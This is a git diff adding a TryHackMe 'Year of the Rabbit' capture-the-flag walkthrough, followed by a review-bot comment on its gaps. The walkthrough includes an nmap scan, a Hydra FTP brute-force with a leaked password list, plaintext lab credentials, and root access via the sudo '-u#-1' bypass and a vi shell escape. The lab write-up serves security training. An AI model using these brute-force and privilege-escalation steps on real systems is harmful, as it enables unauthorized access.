diff --git a/TryHackMe/YearOfRabbit.md b/TryHackMe/YearOfRabbit.md
new file mode 100644
index 0000000..6a9769c
--- /dev/null
+++ b/TryHackMe/YearOfRabbit.md
@@ -0,0 +1,247 @@
+# TryHackMe-YearOfRabbit
+
+>Abdullah Rizwan | 09:12 PM , 18th October
+
+## NMAP
+
+```
+Nmap scan report for 10.10.20.206
+Host is up (0.17s latency).
+Not shown: 997 closed ports
+PORT STATE SERVICE VERSION
+21/tcp open ftp vsftpd 3.0.2
+22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
+| ssh-hostkey:
+| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
+| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
+| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
+|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
+80/tcp open http Apache httpd 2.4.10 ((Debian))
+|_http-server-header: Apache/2.4.10 (Debian)
+|_http-title: Apache2 Debian Default Page: It works
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds
+
+```
+## PORT 80
+
+Looking at the souce and visiting `css` file we will find a hidden page `/sup3r_s3cret_fl4g/` that will say to turn off javascript. We will be brought up to a Rick rolled video.
+
+## Burpsuite
+
+Intercept the request on `/sup3r_s3cret_fl4g/`
+
+
+
+
+
+Now visiting the page `/WExYY2Cv-qU`
+
+We will find an image
+
+running `strings` on image
+
+```
+Eh, you've earned this. Username for FTP is ftpuser
+One of these is the password:
+Mou+56n%QK8sr
+1618B0AUshw1M
+A56IpIl%1s02u
+vTFbDzX9&Nmu?
+FfF~sfu^UQZmT
+8FF?iKO27b~V0
+ua4W~2-@y7dE$
+3j39aMQQ7xFXT
+Wb4--CTc4ww*-
+u6oY9?nHv84D&
+0iBp4W69Gr_Yf
+TS*%miyPsGV54
+C77O3FIy0c0sd
+O14xEhgg0Hxz1
+5dpv#Pr$wqH7F
+1G8Ucoce1+gS5
+0plnI%f0~Jw71
+0kLoLzfhqq8u&
+kS9pn5yiFGj6d
+zeff4#!b5Ib_n
+rNT4E4SHDGBkl
+KKH5zy23+S0@B
+3r6PHtM4NzJjE
+gm0!!EC1A0I2?
+HPHr!j00RaDEi
+7N+J9BYSp4uaY
+PYKt-ebvtmWoC
+3TN%cD_E6zm*s
+eo?@c!ly3&=0Z
+nR8&FXz$ZPelN
+eE4Mu53UkKHx#
+86?004F9!o49d
+SNGY0JjA5@0EE
+trm64++JZ7R6E
+3zJuGL~8KmiK^
+CR-ItthsH%9du
+yP9kft386bB8G
+A-*eE3L@!4W5o
+GoM^$82l&GA5D
+1t$4$g$I+V_BH
+0XxpTd90Vt8OL
+j0CN?Z#8Bp69_
+G#h~9@5E5QA5l
+DRWNM7auXF7@j
+Fw!if_=kk7Oqz
+92d5r$uyw!vaE
+c-AA7a2u!W2*?
+zy8z3kBi#2e36
+J5%2Hn+7I6QLt
+gL$2fmgnq8vI*
+Etb?i?Kj4R=QM
+7CabD7kwY7=ri
+4uaIRX~-cY6K4
+kY1oxscv4EB2d
+k32?3^x1ex7#o
+ep4IPQ_=ku@V8
+tQxFJ909rd1y2
+5L6kpPR5E2Msn
+65NX66Wv~oFP2
+LRAQ@zcBphn!1
+V4bt3*58Z32Xe
+ki^t!+uqB?DyI
+5iez1wGXKfPKQ
+nJ90XzX&AnF5v
+7EiMd5!r%=18c
+wYyx6Eq-T^9#@
+yT2o$2exo~UdW
+ZuI-8!JyI6iRS
+PTKM6RsLWZ1&^
+3O$oC~%XUlRO@
+KW3fjzWpUGHSW
+nTzl5f=9eS&*W
+WS9x0ZF=x1%8z
+Sr4*E4NT5fOhS
+hLR3xQV*gHYuC
+4P3QgF5kflszS
+NIZ2D%d58*v@R
+0rJ7p%6Axm05K
+94rU30Zx45z5c
+Vi^Qf+u%0*q_S
+1Fvdp&bNl3#&l
+zLH%Ot0Bw&c%9
+```
+
+## Hydra
+```
+hydra -l ftpuser -P passwords.txt ftp://10.10.20.206 -t 4
+Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-18 22:06:01
+[DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task
+[DATA] attacking ftp://10.10.20.206:21/
+[21][ftp] host: 10.10.20.206 login: ftpuser password: 5iez1wGXKfPKQ
+[STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active
+1 of 1 target successfully completed, 1 valid password found
+Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-18 22:07:03
+```
+
+## FTP
+
+```
+root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ftp 10.10.20.206
+Connected to 10.10.20.206.
+220 (vsFTPd 3.0.2)
+Name (10.10.20.206:root): ftpuser
+331 Please specify the password.
+Password:
+230 Login successful.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> ls -la
+200 PORT command successful. Consider using PASV.
+150 Here comes the directory listing.
+drwxr-xr-x 2 0 0 4096 Jan 23 2020 .
+drwxr-xr-x 2 0 0 4096 Jan 23 2020 ..
+-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
+226 Directory send OK.
+ftp>
+
+```
+On getting `Eli's_Creds.txt` we will find brainfuck language
+
+```
++++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
+--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
+++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
++++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
+]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
+++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
+--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
++<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
+++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
+<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
+<]>+. <+++[ ->--- <]>-- ---.- ----. <
+```
+`https://www.dcode.fr/brainfuck-language`
+
+on decoding it
+
+```
+User: eli
+Password: DSpDiM1wAEwid
+```
+This may be the ssh password for `eli`
+
+## SSH
+
+```
+root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ssh eli@10.10.20.206
+The authenticity of host '10.10.20.206 (10.10.20.206)' can't be established.
+ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
+Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+Warning: Permanently added '10.10.20.206' (ECDSA) to the list of known hosts.
+eli@10.10.20.206's password:
+
+
+1 new message
+Message from Root to Gwendoline:
+
+"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
+
+END MESSAGE
+
+
+
+
+eli@year-of-the-rabbit:~$
+
+
+```
+
+
+```
+eli@year-of-the-rabbit:/home/gwendoline$ find / -type d -name "s3cr3t" 2>/dev/null
+/usr/games/s3cr3t
+```
+
+```
+ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
+Your password is awful, Gwendoline.
+It should be at least 60 characters long! Not just MniVCQVhQHUNI
+Honestly!
+
+Yours sincerely
+ -Root
+
+```
+## Previlege Escalation
+
+```
+sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
+```
+on the vim editor
+
+:!sh
+
+```
+# bash
+```
\ No newline at end of file
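Review bot: The "Previlege Escalation" section at the end of the file runs `sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt` without showing why it works or how the session moved from `eli` to `gwendoline`. Add the `su gwendoline` step that uses the password from the hidden message, then the `sudo -l` output and the sudo version, so the reader can see which sudoers rule the `-u#-1` form depends on. The "Burpsuite" section has the same kind of gap: it goes from "Intercept the request on `/sup3r_s3cret_fl4g/`" to `/WExYY2Cv-qU` across four blank lines, so say what in the intercepted traffic revealed that path, or restore the missing capture. Smaller points: "souce" and "Previlege" are misspelled, the date in the byline has no year, the full 82-entry candidate list could be cut to a few lines since the Hydra output already shows the match, and the file needs a trailing newline.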